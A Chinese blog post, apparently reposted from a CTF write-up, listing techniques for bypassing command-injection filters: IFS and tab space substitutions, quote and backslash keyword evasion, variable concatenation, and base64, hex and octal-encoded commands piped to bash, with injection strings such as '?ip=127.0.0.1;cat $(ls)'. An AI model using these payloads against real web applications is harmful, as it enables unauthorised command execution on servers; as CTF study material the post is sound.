命令执行漏洞-绕过

于 2023-09-08 11:09:16 发布
阅读量134 收藏
点赞数
文章标签: 安全

面对命令执行漏洞,如果有规则检验,我们可以通过以下方式绕过:

空格绕过

  • ${IFS}
  • ${IFS}$1
  • $IFS$1
  • <和<>
  • {cat,flag}
  • %20替换
  • %0a (换行)
  • %0d (回车)
  • %09 (tab)

黑名单(关键字)绕过

  • 单引号、双引号绕过:c"at"t fl''ag
  • 反斜线绕过:ca\t fl\ag
  • 和num和@绕过:c$1at fl$@ag
  • 拼接绕过:a=c;b=at;c=fl;d=ag; $a$b $c$d (不用加|)
    • /?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php或者
    • /?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php
  • base64:
    • echo "Y2F0IGZsYWc="|base64 -d
    • echo "Y2F0IGZsYWc="|base64 -d|bash
    • |echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
  • hex编码绕过:
    • echo "0x63617420666c61670a" | xxd -r -p|bash
  • oct编码绕过:
    • $(printf "\x63\x61\x74\x20\x66\x6c\x61\x67")
    • {printf,"\x63\x61\x74\x20\x66\x6c\x61\x67"}|$0

内联绕过:

所谓内联绕过就是将反引号内命令的输出作为输入执行,比如系统对flag字符进行了过滤,那么我们可以通过ls命令将flag.php输出作为输入,有以下两种方式:

  • ?ip=127.0.0.1;cat 'ls'
  • ?ip=127.0.0.1;cat $(ls)

转载出处:[GXYCTF2019]Ping Ping Ping 1【文件执行漏洞】 - 知乎

xiukc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
命令执行漏洞 | iwebsec
weixin_52116519的博客
02-26 2218
应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常的命令中,从而造成命令执行攻击,这就是命令执行漏洞。【摘自《web安全攻防》】管道符作用举例直接执行后面的命令。||前面执行命令执行出错才执行后面的语句。前面的语句无论真假都可以执行后面的语句。(无条件执行后面的语句,推荐使用。&&
绕过之cat|/ flag
m0_61011147的博客
09-06 1937
绕过之cat|/ flag
WEB知识学习
qq_41672971的博客
10-11 283
123
25分钟了解命令执行漏洞【例题+详细讲解】(一)
贤鱼的博客
09-11 2661
一文初入命令执行漏洞
命令执行绕过
qq_51175992的博客
07-10 160
CTF中常见的题型——命令指向及绕过
第二节 Windows命令执行漏洞利用技巧-01
最新发布
09-15
本篇文章对Windows命令执行漏洞利用技巧进行了详细的讲解,包括命令执行示例代码分析、命令执行漏洞利用思路、命令执行漏洞拼接符介绍和命令执行漏洞利用演示。这些技术可以使攻击者绕过系统的安全检查,从而执行...
Apache Shiro Padding Oracle漏洞可导致远程命令执行漏洞解决
01-09
Apach Shiro官方披露其cookie持久化参数rememberMe加密算法存在漏洞,可被Padding Oracle攻击,攻击者利用Padding Oracle攻击手段可构造恶意的rememberMe值,绕过加密算法验证,执行java反序列化操作,最终可导致...
CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析1
08-03
**文章标题:**深入解析CVE-2020-24581:D-Link DSL-2888A远程命令执行漏洞 **文章正文:** D-Link DSL-2888A是一款由D-Link公司制造的统一服务路由器,它在AU_2.31_V1.1.47ae55之前的版本中存在一个严重的安全...
绕过WAF运行命令执行漏洞的方法大全1
08-03
前言一、windows下前天安全客当然你可以加无数个”但不能同时连续加2个^符号,因为^号是cmd中的转义符,跟在他后面的符号会被转义如果在命令执行的时候遇到了
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
命令执行的一些绕过技巧
m0_55754984的博客
09-14 3405
① 空格过滤 空格可以用以下字符串代替: < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 $IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用 ,但是为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 ② 一些命令分隔符 linux中:%0a
攻防世界web新手练习 -unseping
yuanxu8877的博客
10-19 6838
新版攻防世界XCTF-web新手练习
绕过WAF运行命令执行漏洞的方法大全
hackzkaq的博客
10-09 2113
文章目录**前言****一、windows下**二、进入linux三、一个有趣的例子总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。 一、windows下 1.1 符号与命令的关系 在看一个例子开始之前,首先了解一点,”和^这还有成对的圆括号()符号并不会影响命令执行。在windows环境下,命令可以不区分大小写 whoami //正常执行 w"h"o"a"m"i //正常执行 w"h"o"a"m"i" //正常执行 wh"“oami //正常执
CTF命令执行绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
(RCE)命令执行和代码执行的原理、危害、防范、绕过
m0_52556798的博客
03-19 2634
RCE包括系统命令执行和代码执行,照这样下去owasp top10 快总结完了! rce原理讲讲? 远程系统命令执行 是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交能执行命令,从而让后台进行执行,从而控制整个后台服务器。 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试
远程命令/代码执行漏洞(RCE)总结
nigo134的博客
07-04 8173
PHP命令执行函数 1. system() : 原型:string system ( string $command [, int &$return_var ] ) 与passthru的基本相同,但是system返回结果并且输出。(查看system和pssthru的返回值可以看出) 2. shell_exec(): shell_exec — 通过 shell 环境执行命令 ( 这就意味着这个方法只能在 linux 或 mac os的shell环境中运行 ),并且将完整的输出以字符串的方式返
cat命令读取一部分_命令注入绕过方式总结
weixin_42373789的博客
01-30 1809
前言命令注入是web中常见的漏洞之一,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被linux或windows系统当成命令执行,一般都会造成严重的危害。常用符号分号(;)多条语句顺序执行时的分割符号。1cmd1;cmd2管道符(|)cmd1命令的输出,作为下一条命令cmd2的参数。1cmd1|cmd2and(&&)与命令,cmd1成功则执行cmd...
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 9710
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
web命令执行常见绕过方式
07-10
常见的web命令执行绕过方式包括: 1. 输入过滤绕过:通过使用各种编码、特殊字符或绕过函数来绕过输入过滤机制,如使用URL编码、HTML编码、Unicode编码等。 2. 命令分隔符绕过:通过插入特殊字符或空格来绕过命令分隔符,如使用分号、竖线、反斜杠等。 3. 输入截断绕过:通过在输入中插入特殊字符,使输入被截断,从而绕过输入过滤和命令分隔符。 4. 操作符绕过:通过使用不同的操作符或操作符的变体来绕过命令执行过滤,如使用逻辑操作符、比较操作符等。 5. 输入验证绕过:通过绕过输入验证机制,如绕过正则表达式、绕过黑名单等,来执行恶意命令。 6. 操作系统命令绕过:通过绕过操作系统命令执行的限制,如使用操作系统特定的命令命令的变体、命令替换等。 7. 文件扩展名绕过:通过伪装文件扩展名或使用特殊的文件扩展名来绕过文件上传过滤器,从而执行恶意命令。 请注意,这些绕过方式仅供参考,具体的绕过方式可能因应用程序和环境而异。在编写安全的web应用程序时,应该采取适当的输入验证、过滤和编码措施来防止命令执行漏洞的利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值